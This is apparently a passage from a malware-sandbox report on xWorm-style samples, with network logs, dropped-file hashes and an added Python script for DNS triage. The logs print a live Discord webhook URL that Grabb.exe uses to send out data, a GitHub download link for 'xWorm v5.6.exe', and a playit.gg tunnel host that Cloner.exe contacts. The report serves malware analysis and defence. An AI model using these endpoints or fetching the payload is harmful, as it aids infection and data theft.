                                      IN A
                                      162.159.138.232
                                      canary.discord.com
                                      IN A
                                      162.159.136.232
                                    • [US]
                                      POST
                                      https://canary.discord.com/api/webhooks/1279146469588340746/OZT0SJ0y5zhhi2z7H8eJ576F3-SmO2zrejY7aiS_DYX6c0ea5nuejVV4CjY8Hs9MDl_G
                                      Grabb.exe
                                      Remote address:
                                      162.159.137.232:443
                                      Request
                                      POST /api/webhooks/1279146469588340746/OZT0SJ0y5zhhi2z7H8eJ576F3-SmO2zrejY7aiS_DYX6c0ea5nuejVV4CjY8Hs9MDl_G HTTP/1.1
                                      Accept: application/json
                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                      Content-Type: application/json; charset=utf-8
                                      Host: canary.discord.com
                                      Content-Length: 940
                                      Expect: 100-continue
                                      Connection: Keep-Alive
                                      Response
                                      HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 15:01:13 GMT
                                      Content-Type: application/json
                                      Content-Length: 45
                                      Connection: keep-alive
                                      CF-Ray: 8bef55452bed7791-LHR
                                      CF-Cache-Status: DYNAMIC
                                      Set-Cookie: __dcfduid=dbda3c5e6c6011efaea38aa41e88672c; Expires=Wed, 05-Sep-2029 15:01:13 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      X-Content-Type-Options: nosniff
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 4
                                      x-ratelimit-reset: 1725634874
                                      x-ratelimit-reset-after: 1
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iNiBDpP0WeicLS7CX7%2F0yIzPBXdmHpe4bZORLdjRgP6tz12fokvVPFhZQmBTxeTzBf%2FUWZUVep1JF%2BYNFPqZN%2FsPxHEqUHJnInnsuyszzHK9dt2q3QIczH1tPjMvjZTZ2y09xw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                      Reporting-Endpoints: csp-sentry=https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                      Set-Cookie: __sdcfduid=dbda3c5e6c6011efaea38aa41e88672ca75d4c924fbf294c5df5638faeed2c52904ea2b50170733bf2c06cf51faec99c; Expires=Wed, 05-Sep-2029 15:01:13 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                      Set-Cookie: __cfruid=57c76d52f9d5e91bf7fac9befe75e9d35d51006e-1725634873; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Set-Cookie: _cfuvid=FBK5z0SQX_ShA7kJix9I8Au8.9rypa9aN7BVfLvHOdQ-1725634873351-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                      Server: cloudflare
                                    • [US]
                                      POST
                                      https://canary.discord.com/api/webhooks/1279146469588340746/OZT0SJ0y5zhhi2z7H8eJ576F3-SmO2zrejY7aiS_DYX6c0ea5nuejVV4CjY8Hs9MDl_G
                                      Grabb.exe
                                      Remote address:
                                      162.159.137.232:443
                                      Request
                                      POST /api/webhooks/1279146469588340746/OZT0SJ0y5zhhi2z7H8eJ576F3-SmO2zrejY7aiS_DYX6c0ea5nuejVV4CjY8Hs9MDl_G HTTP/1.1
                                      Accept: application/json
                                      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                      Content-Type: multipart/form-data; boundary="9bcd025f-60b2-491d-96e1-2085744242e8"
                                      Host: canary.discord.com
                                      Cookie: __dcfduid=dbda3c5e6c6011efaea38aa41e88672c; __sdcfduid=dbda3c5e6c6011efaea38aa41e88672ca75d4c924fbf294c5df5638faeed2c52904ea2b50170733bf2c06cf51faec99c; __cfruid=57c76d52f9d5e91bf7fac9befe75e9d35d51006e-1725634873; _cfuvid=FBK5z0SQX_ShA7kJix9I8Au8.9rypa9aN7BVfLvHOdQ-1725634873351-0.0.1.1-604800000
                                      Content-Length: 443282
                                      Expect: 100-continue
                                      Response
                                      HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 15:01:13 GMT
                                      Content-Type: application/json
                                      Content-Length: 45
                                      Connection: keep-alive
                                      CF-Ray: 8bef5546ae297791-LHR
                                      CF-Cache-Status: DYNAMIC
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Via: 1.1 google
                                      alt-svc: h3=":443"; ma=86400
                                      X-Content-Type-Options: nosniff
                                      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                      x-ratelimit-limit: 5
                                      x-ratelimit-remaining: 3
                                      x-ratelimit-reset: 1725634875
                                      x-ratelimit-reset-after: 1
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MWcyqT7jhOmqT%2FsGp2qPMcv1EMBoXsdW%2FcbHIZRWqM1LYLozAg%2FBXakOaNal2ViYD%2Fh%2F%2Fna5SFADXYf2rUT3iwIY3QtqRUYIfh8XOc51w8eaKmBN3RTv2rLEu6SMtBPVRvnzuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                      Reporting-Endpoints: csp-sentry=https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870
                                      Server: cloudflare
                                    • [US]
                                      DNS
                                      232.137.159.162.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      232.137.159.162.in-addr.arpa
                                      IN PTR
                                      Response
                                    • [US]
                                      DNS
                                      japanese-longer.gl.at.ply.gg
                                      Cloner.exe
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      japanese-longer.gl.at.ply.gg
                                      IN A
                                      Response
                                      japanese-longer.gl.at.ply.gg
                                      IN A
                                      147.185.221.22
                                    • [US]
                                      DNS
                                      22.221.185.147.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      22.221.185.147.in-addr.arpa
                                      IN PTR
                                      Response
                                    • [US]
                                      DNS
                                      103.169.127.40.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      103.169.127.40.in-addr.arpa
                                      IN PTR
                                      Response
                                    • [US]
                                      DNS
                                      18.31.95.13.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      18.31.95.13.in-addr.arpa
                                      IN PTR
                                      Response
                                    • [US]
                                      DNS
                                      92.12.20.2.in-addr.arpa
                                      Remote address:
                                      8.8.8.8:53
                                      Request
                                      92.12.20.2.in-addr.arpa
                                      IN PTR
                                      Response
                                      92.12.20.2.in-addr.arpa
                                      IN PTR
                                      a2-20-12-92.deploy.static.akamaitechnologies.com
                                    • 20.26.156.215:443
                                      https://github.com/3z02/Dont-/raw/main/xWorm+v5.6.exe
                                      tls, http2
                                      msedge.exe
                                      1.9kB
                                      8.0kB
                                      17
                                      14

                                      HTTP Request

                                      GET https://github.com/3z02/Dont-/raw/main/xWorm+v5.6.exe

                                      HTTP Response

                                      302
                                    • 185.199.109.133:443
                                      https://raw.githubusercontent.com/3z02/Dont-/main/xWorm%2Bv5.6.exe
                                      tls, http2
                                      msedge.exe
                                      255.8kB
                                      13.0MB
                                      5311
                                      9320

                                      HTTP Request

                                      GET https://raw.githubusercontent.com/3z02/Dont-/main/xWorm%2Bv5.6.exe

                                      HTTP Response

                                      200
                                    • 142.250.102.94:443
                                      https://gstatic.com/generate_204
                                      tls, http
                                      Grabb.exe
                                      724 B
                                      4.9kB
                                      8
                                      8

                                      HTTP Request

                                      GET https://gstatic.com/generate_204

                                      HTTP Response

                                      204
                                    • 208.95.112.1:80
                                      http://ip-api.com/line/?fields=hosting
                                      http
                                      Grabb.exe
                                      310 B
                                      267 B
                                      5
                                      2

                                      HTTP Request

                                      GET http://ip-api.com/line/?fields=hosting

                                      HTTP Response

                                      200
                                    • 208.95.112.1:80
                                      http://ip-api.com/json/?fields=225545
                                      http
                                      Grabb.exe
                                      285 B
                                      510 B
                                      5
                                      4

                                      HTTP Request

                                      GET http://ip-api.com/json/?fields=225545

                                      HTTP Response

                                      200
                                    • 162.159.137.232:443
                                      https://canary.discord.com/api/webhooks/1279146469588340746/OZT0SJ0y5zhhi2z7H8eJ576F3-SmO2zrejY7aiS_DYX6c0ea5nuejVV4CjY8Hs9MDl_G
                                      tls, http
                                      Grabb.exe
                                      460.2kB
                                      12.4kB
                                      341
                                      156

                                      HTTP Request

                                      POST https://canary.discord.com/api/webhooks/1279146469588340746/OZT0SJ0y5zhhi2z7H8eJ576F3-SmO2zrejY7aiS_DYX6c0ea5nuejVV4CjY8Hs9MDl_G

                                      HTTP Response

                                      404

                                      HTTP Request

                                      POST https://canary.discord.com/api/webhooks/1279146469588340746/OZT0SJ0y5zhhi2z7H8eJ576F3-SmO2zrejY7aiS_DYX6c0ea5nuejVV4CjY8Hs9MDl_G

                                      HTTP Response

                                      404
                                    • 147.185.221.22:28461
                                      japanese-longer.gl.at.ply.gg
                                      Cloner.exe
                                      16.5kB
                                      669.6kB
                                      319
                                      527
                                    • 147.185.221.22:28461
                                      japanese-longer.gl.at.ply.gg
                                      Cloner.exe
                                      198.8kB
                                      3.9kB
                                      156
                                      77
                                    • 8.8.8.8:53
                                      8.8.8.8.in-addr.arpa
                                      dns
                                      66 B
                                      90 B
                                      1
                                      1

                                      DNS Request

                                      8.8.8.8.in-addr.arpa

                                    • 8.8.8.8:53
                                      217.106.137.52.in-addr.arpa
                                      dns
                                      73 B
                                      147 B
                                      1
                                      1

                                      DNS Request

                                      217.106.137.52.in-addr.arpa

                                    • 8.8.8.8:53
                                      github.com
                                      dns
                                      msedge.exe
                                      56 B out / 72 B in, 1 request / 1 response
                                      DNS Request: github.com
                                      DNS Response: 20.26.156.215

                                    • 8.8.8.8:53  raw.githubusercontent.com  dns  msedge.exe
                                      71 B out / 135 B in, 1 request / 1 response
                                      DNS Request: raw.githubusercontent.com
                                      DNS Response: 185.199.109.133, 185.199.110.133, 185.199.111.133, 185.199.108.133

                                    • 8.8.8.8:53  215.156.26.20.in-addr.arpa  dns
                                      72 B out / 158 B in, 1 request / 1 response
                                      DNS Request: 215.156.26.20.in-addr.arpa

                                    • 8.8.8.8:53  34.56.20.217.in-addr.arpa  dns
                                      71 B out / 131 B in, 1 request / 1 response
                                      DNS Request: 34.56.20.217.in-addr.arpa

                                    • 8.8.8.8:53  95.221.229.192.in-addr.arpa  dns
                                      73 B out / 144 B in, 1 request / 1 response
                                      DNS Request: 95.221.229.192.in-addr.arpa

                                    • 8.8.8.8:53  22.160.190.20.in-addr.arpa  dns
                                      72 B out / 158 B in, 1 request / 1 response
                                      DNS Request: 22.160.190.20.in-addr.arpa

                                    • 224.0.0.251:5353  mdns
                                      398 B out, 6 requests

                                    • 8.8.8.8:53  133.109.199.185.in-addr.arpa  dns
                                      74 B out / 118 B in, 1 request / 1 response
                                      DNS Request: 133.109.199.185.in-addr.arpa

                                    • 8.8.8.8:53  241.150.49.20.in-addr.arpa  dns
                                      72 B out / 158 B in, 1 request / 1 response
                                      DNS Request: 241.150.49.20.in-addr.arpa

                                    • 8.8.8.8:53  gstatic.com  dns  Grabb.exe
                                      57 B out / 89 B in, 1 request / 1 response
                                      DNS Request: gstatic.com
                                      DNS Response: 142.250.102.94, 142.250.102.120

                                    • 8.8.8.8:53  ip-api.com  dns  Grabb.exe
                                      56 B out / 72 B in, 1 request / 1 response
                                      DNS Request: ip-api.com
                                      DNS Response: 208.95.112.1

                                    • 8.8.8.8:53  94.102.250.142.in-addr.arpa  dns
                                      73 B out / 106 B in, 1 request / 1 response
                                      DNS Request: 94.102.250.142.in-addr.arpa

                                    • 8.8.8.8:53  1.112.95.208.in-addr.arpa  dns
                                      71 B out / 95 B in, 1 request / 1 response
                                      DNS Request: 1.112.95.208.in-addr.arpa

                                    • 8.8.8.8:53  canary.discord.com  dns  Grabb.exe
                                      64 B out / 144 B in, 1 request / 1 response
                                      DNS Request: canary.discord.com
                                      DNS Response: 162.159.137.232, 162.159.135.232, 162.159.128.233, 162.159.138.232, 162.159.136.232

                                    • 8.8.8.8:53  232.137.159.162.in-addr.arpa  dns
                                      74 B out / 136 B in, 1 request / 1 response
                                      DNS Request: 232.137.159.162.in-addr.arpa

                                    • 8.8.8.8:53  japanese-longer.gl.at.ply.gg  dns  Cloner.exe
                                      74 B out / 90 B in, 1 request / 1 response
                                      DNS Request: japanese-longer.gl.at.ply.gg
                                      DNS Response: 147.185.221.22

                                    • 8.8.8.8:53  22.221.185.147.in-addr.arpa  dns
                                      73 B out / 130 B in, 1 request / 1 response
                                      DNS Request: 22.221.185.147.in-addr.arpa

                                    • 8.8.8.8:53  103.169.127.40.in-addr.arpa  dns
                                      73 B out / 147 B in, 1 request / 1 response
                                      DNS Request: 103.169.127.40.in-addr.arpa

                                    • 8.8.8.8:53  18.31.95.13.in-addr.arpa  dns
                                      70 B out / 144 B in, 1 request / 1 response
                                      DNS Request: 18.31.95.13.in-addr.arpa

                                    • 8.8.8.8:53  92.12.20.2.in-addr.arpa  dns
                                      69 B out / 131 B in, 1 request / 1 response
                                      DNS Request: 92.12.20.2.in-addr.arpa
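
The DNS entries above are the raw evidence; what a responder wants from them is the process-to-destination mapping and an answer to which forward lookup each in-addr.arpa query belongs to. The Python below is an added example and is not part of the sandbox report or of the sandbox's own tooling: it transcribes the entries above into records, tags each name with a suffix table that is this example's own heuristic (playit.gg tunnel endpoints, ip-api.com, Discord, GitHub), reverses the PTR names back into addresses and matches them against the forward answers in the table, and summarises which process resolved which class of destination.

```python
"""Triage the DNS table above: tag each query, attribute PTR lookups, summarise per process.

Added example, not part of the sandbox report or of the sandbox's tooling.
REPORT_DNS is transcribed from the report's DNS entries (process, query name,
answers); the suffix-to-tag table and the PTR attribution are this example's
own heuristics, not sandbox output.
"""
from __future__ import annotations

from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class DnsRecord:
    process: str | None           # None where the report shows no process column
    qname: str
    answers: tuple[str, ...] = ()


REPORT_DNS: list[DnsRecord] = [
    DnsRecord(None, "github.com", ("20.26.156.215",)),  # process column is outside this excerpt
    DnsRecord("msedge.exe", "raw.githubusercontent.com",
              ("185.199.109.133", "185.199.110.133", "185.199.111.133", "185.199.108.133")),
    DnsRecord("Grabb.exe", "gstatic.com", ("142.250.102.94", "142.250.102.120")),
    DnsRecord("Grabb.exe", "ip-api.com", ("208.95.112.1",)),
    DnsRecord("Grabb.exe", "canary.discord.com",
              ("162.159.137.232", "162.159.135.232", "162.159.128.233",
               "162.159.138.232", "162.159.136.232")),
    DnsRecord("Cloner.exe", "japanese-longer.gl.at.ply.gg", ("147.185.221.22",)),
] + [
    DnsRecord(None, ptr) for ptr in (
        "215.156.26.20.in-addr.arpa", "34.56.20.217.in-addr.arpa",
        "95.221.229.192.in-addr.arpa", "22.160.190.20.in-addr.arpa",
        "133.109.199.185.in-addr.arpa", "241.150.49.20.in-addr.arpa",
        "94.102.250.142.in-addr.arpa", "1.112.95.208.in-addr.arpa",
        "232.137.159.162.in-addr.arpa", "22.221.185.147.in-addr.arpa",
        "103.169.127.40.in-addr.arpa", "18.31.95.13.in-addr.arpa",
        "92.12.20.2.in-addr.arpa",
    )
]

# Domain suffix -> triage tag. Heuristic table chosen for this example.
SUFFIX_TAGS = {
    "ply.gg": "tunnel-c2",               # playit.gg tunnel endpoint; the report's C2 resolves here
    "ip-api.com": "external-ip-lookup",  # victim IP / geolocation discovery
    "discord.com": "webhook-exfil",      # Discord webhook used as an exfil channel
    "discordapp.com": "webhook-exfil",
    "github.com": "payload-hosting",     # legitimate hosting abused for delivery
    "githubusercontent.com": "payload-hosting",
}
INFORMATIONAL = {"benign-or-unknown", "reverse-lookup"}


def classify(qname: str) -> str:
    """Tag a query name; PTR names get their own tag so they are never scored as C2."""
    name = qname.lower().rstrip(".")
    if name.endswith(".in-addr.arpa"):
        return "reverse-lookup"
    for suffix, tag in SUFFIX_TAGS.items():
        if name == suffix or name.endswith("." + suffix):
            return tag
    return "benign-or-unknown"


def ptr_to_ip(qname: str) -> str | None:
    """'22.221.185.147.in-addr.arpa' -> '147.185.221.22'; None if not an IPv4 PTR name."""
    name = qname.lower().rstrip(".")
    if not name.endswith(".in-addr.arpa"):
        return None
    octets = name[: -len(".in-addr.arpa")].split(".")
    if len(octets) != 4 or not all(o.isdigit() and int(o) <= 255 for o in octets):
        return None
    return ".".join(reversed(octets))


def attribute_reverse_lookups(records: list[DnsRecord]) -> dict[str, str | None]:
    """Map each PTR query to the forward name whose answer it reverses (None if none)."""
    ip_to_name = {ip: r.qname for r in records for ip in r.answers}
    return {r.qname: ip_to_name.get(ptr_to_ip(r.qname))
            for r in records if ptr_to_ip(r.qname) is not None}


def suspicious_processes(records: list[DnsRecord]) -> dict[str, set[str]]:
    """Processes whose forward lookups carry a non-informational tag, with the tags seen."""
    hits: dict[str, set[str]] = defaultdict(set)
    for r in records:
        tag = classify(r.qname)
        if r.process and tag not in INFORMATIONAL:
            hits[r.process].add(tag)
    return dict(hits)


if __name__ == "__main__":
    for proc, tags in suspicious_processes(REPORT_DNS).items():
        print(f"{proc}: {sorted(tags)}")
    for ptr, name in attribute_reverse_lookups(REPORT_DNS).items():
        print(f"{ptr} -> {ptr_to_ip(ptr)} ({name or 'no matching forward lookup'})")
```

Run as-is, Cloner.exe is the only process resolving a tunnel endpoint, Grabb.exe is the one doing the external-IP lookup and the Discord resolution, and six of the thirteen reverse lookups attach to forward answers in the table; the other seven have no forward lookup in this excerpt, so the example reports them as unattributed rather than guessing at their origin.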

                                    MITRE ATT&CK Enterprise v15


                                    Downloads

                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                      Filesize

                                      2KB

                                      MD5

                                      d85ba6ff808d9e5444a4b369f5bc2730

                                      SHA1

                                      31aa9d96590fff6981b315e0b391b575e4c0804a

                                      SHA256

                                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                      SHA512

                                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                      Filesize

                                      152B

                                      MD5

                                      d7114a6cd851f9bf56cf771c37d664a2

                                      SHA1

                                      769c5d04fd83e583f15ab1ef659de8f883ecab8a

                                      SHA256

                                      d2c75c7d68c474d4b8847b4ba6cfd09fe90717f46dd398c86483d825a66e977e

                                      SHA512

                                      33bdae2305ae98e7c0de576de5a6600bd70a425e7b891d745cba9de992036df1b3d1df9572edb0f89f320e50962d06532dae9491985b6b57fd37d5f46f7a2ff8

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                      Filesize

                                      152B

                                      MD5

                                      719923124ee00fb57378e0ebcbe894f7

                                      SHA1

                                      cc356a7d27b8b27dc33f21bd4990f286ee13a9f9

                                      SHA256

                                      aa22ab845fa08c786bd3366ec39f733d5be80e9ac933ed115ff048ff30090808

                                      SHA512

                                      a207b6646500d0d504cf70ee10f57948e58dab7f214ad2e7c4af0e7ca23ce1d37c8c745873137e6c55bdcf0f527031a66d9cc54805a0eac3678be6dd497a5bbc

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                      Filesize

                                      261B

                                      MD5

                                      2c2e6472d05e3832905f0ad4a04d21c3

                                      SHA1

                                      007edbf35759af62a5b847ab09055e7d9b86ffcc

                                      SHA256

                                      283d954fa21caa1f3b4aba941b154fab3e626ff27e7b8029f5357872c48cbe03

                                      SHA512

                                      8c4ce1ea02da6ffb7e7041c50528da447d087d9ee3c9f4a8c525d2d856cf48e46f5dd9a1fedd23dd047634e719c8886457f7e7240aa3cc36f1a6216e4c00ee37

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                      Filesize

                                      5KB

                                      MD5

                                      1f634ef83ec1de89e5a03adea99f280a

                                      SHA1

                                      0b2544cde4e75f436ae7b4806bb29e7a33a3723a

                                      SHA256

                                      82852f0d4b7476666b34450b794b723ce841c4f51603e8460813313985b84c01

                                      SHA512

                                      201b064928e35516eed1baed8749a8d8c33b2e92cf9b6e1e5074cdad553ad556b5e586c938176024dc8b97eaec7aa11f6ae153ca6eb171a7d7dc593ad35f40b8

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                      Filesize

                                      6KB

                                      MD5

                                      e791b3c834276f40cc2572d73b1794bd

                                      SHA1

                                      5b570fad2914b0ad87fe1bb3a1d2653f9fa8379f

                                      SHA256

                                      40492befc227751b40b59552cf000168acc9f65b1bdd1edcc6eceb0d6d35f059

                                      SHA512

                                      12c16ff510b4bf67e9debfc6ef31d31b0c9538982b62084a24c4bc0580fbc7b61fdf3c469547fdccff3db0a0f563a9153503f8883bacbe2472042d4ae27e16f7

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                      Filesize

                                      6KB

                                      MD5

                                      6c26049d9c7c47b4bf02763769bb7675

                                      SHA1

                                      835d940c47b260e36c7aa7d20aad4a5f5a5bdb8a

                                      SHA256

                                      ae979ceb533c53b21f3d5f6c77cacbfdea783fa1eee18fe5d6cfabb121c1734b

                                      SHA512

                                      0bb1ebcbd6ff7b7079886fd38cdaa482860ec85fd4dc40cdd1efede68a9feb4177a27c93c6124dc4b1de9c23ba9d63c9d23ae1e2a7d82ede97bb3ca7065f9bba

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                      Filesize

                                      16B

                                      MD5

                                      46295cac801e5d4857d09837238a6394

                                      SHA1

                                      44e0fa1b517dbf802b18faf0785eeea6ac51594b

                                      SHA256

                                      0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

                                      SHA512

                                      8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                      Filesize

                                      16B

                                      MD5

                                      206702161f94c5cd39fadd03f4014d98

                                      SHA1

                                      bd8bfc144fb5326d21bd1531523d9fb50e1b600a

                                      SHA256

                                      1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167

                                      SHA512

                                      0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                      Filesize

                                      10KB

                                      MD5

                                      176a57260cec82c85b681484d3cce36f

                                      SHA1

                                      43107c71a3c343e424c7f3cdbf61d03647c29db5

                                      SHA256

                                      e0dc5f130c877c65354cf86946a6a1c524f7e2fdfc88084410dcf686c7833fef

                                      SHA512

                                      6c2dd386b5753b94a15277e1c644a5950967f10841e1657ee26284fc6864d2eec9b817b7cda8e34b3727fce9ec31412686cdabae47419f3cb6f0d7fe1d292893

                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                      Filesize

                                      10KB

                                      MD5

                                      feea017317645635291d23e72bff944b

                                      SHA1

                                      e4ef1e2e6b29162b8417b9a3224fe84fc087fa8b

                                      SHA256

                                      edf5ead25f12aff387f5cb458b0355b8429fcefb7438a4da3a01e875405f6f85

                                      SHA512

                                      a5f0668e4c74989ab1c3cd2b06bcd44a9e9f7d17a88942786212baac30076724440796ce1ce55fe0143185e7f0f011a9e95cb5132bcc34f83f788ff56bb79380

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      944B

                                      MD5

                                      2979eabc783eaca50de7be23dd4eafcf

                                      SHA1

                                      d709ce5f3a06b7958a67e20870bfd95b83cad2ea

                                      SHA256

                                      006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903

                                      SHA512

                                      92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      948B

                                      MD5

                                      74a6b79d36b4aae8b027a218bc6e1af7

                                      SHA1

                                      0350e46c1df6934903c4820a00b0bc4721779e5f

                                      SHA256

                                      60c64f6803d7ad1408d0a8628100470859b16ef332d5f1bd8bb2debe51251d04

                                      SHA512

                                      60e71435a9a23f4c144d641844f4182ddc9aa4ccd3e99232149a187112dce96458aab9587e9fea46f5dc5a52f5ca758969a04657a2b5b10241d3e4554f7c85e0

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      1KB

                                      MD5

                                      548dd08570d121a65e82abb7171cae1c

                                      SHA1

                                      1a1b5084b3a78f3acd0d811cc79dbcac121217ab

                                      SHA256

                                      cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

                                      SHA512

                                      37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      1KB

                                      MD5

                                      f5925d3b5a24b7220c7b6ce426c1f639

                                      SHA1

                                      de19fe06c3bf1bc6e0df2e157594e7ba4d3ac27a

                                      SHA256

                                      8b247301f487ebafc209b5f962570870ca78080f4cf3177476ad7694f8ba42d7

                                      SHA512

                                      b252965dde16530c92347c389ef0b59b45ee39c3dd494930d51c019f3ac1891fd49eb5b84b4d2647a6e597f369d6a8f4913fba7f39d4eebc4fa575dcff2dbe38

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      944B

                                      MD5

                                      019a54d1f0d6469396d1d79bcca4d41d

                                      SHA1

                                      f7998bbb060a580079940ddc583dfaf798867fa7

                                      SHA256

                                      8dc87996c13c37f8c745ae8c49d477ff1b5e578845ed76f0bab90b157e42040a

                                      SHA512

                                      e3484f695ac2ebfc0430264e63e49a34f9617ac10112929112031baa6c74f1f406ea5e150fd1eb44ab9e0a8470e1bc7c9d416c93357dda9986a80038f26b21d3

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      944B

                                      MD5

                                      04f1d68afbed6b13399edfae1e9b1472

                                      SHA1

                                      8bfdcb687a995e4a63a8c32df2c66dc89f91a8b0

                                      SHA256

                                      f358f33a42122e97c489fad7bbc8beab2eb42d42e4ec7fce0dd61fe6d8c0b8de

                                      SHA512

                                      30c5e72a8134992094d937d2588f7a503b1d6407d11afe0265b7c8b0ce14071925e5caed13fc4f9c28705df4c7aed3601f81b007048b148af274d7784aa5fb75

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      944B

                                      MD5

                                      ba169f4dcbbf147fe78ef0061a95e83b

                                      SHA1

                                      92a571a6eef49fff666e0f62a3545bcd1cdcda67

                                      SHA256

                                      5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

                                      SHA512

                                      8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Filesize

                                      944B

                                      MD5

                                      98baf5117c4fcec1692067d200c58ab3

                                      SHA1

                                      5b33a57b72141e7508b615e17fb621612cb8e390

                                      SHA256

                                      30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

                                      SHA512

                                      344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

                                    • C:\Users\Admin\AppData\Local\Temp\Cloner.exe

                                      Filesize

                                      204KB

                                      MD5

                                      5f43c0499a7d7947f5feb5db1a8726f0

                                      SHA1

                                      3eb4045f1287531843d11e52423472b54494b02b

                                      SHA256

                                      2824d0b186c90e04ab56e026c018e7f521e2127bd526d9fca008eaa613fe4012

                                      SHA512

                                      c7aaee50c4c13b711a46511611c27eb2d6bd92ef26b0b7627f63f34ee45d1386cad819accfd267e89574eea21a5f752706878824f4996b9a7faa4d742789752a

                                    • C:\Users\Admin\AppData\Local\Temp\Grabb.exe

                                      Filesize

                                      231KB

                                      MD5

